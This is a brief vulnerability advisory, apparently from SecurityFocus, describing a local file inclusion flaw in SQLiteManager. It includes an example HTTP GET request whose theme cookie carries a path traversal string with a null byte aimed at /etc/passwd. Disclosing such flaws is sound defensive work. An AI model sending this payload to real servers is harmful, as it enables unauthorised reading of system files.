SQLiteManager Local File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example GET request is available:

GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted


 

Privacy Statement
Copyright 2010, SecurityFocus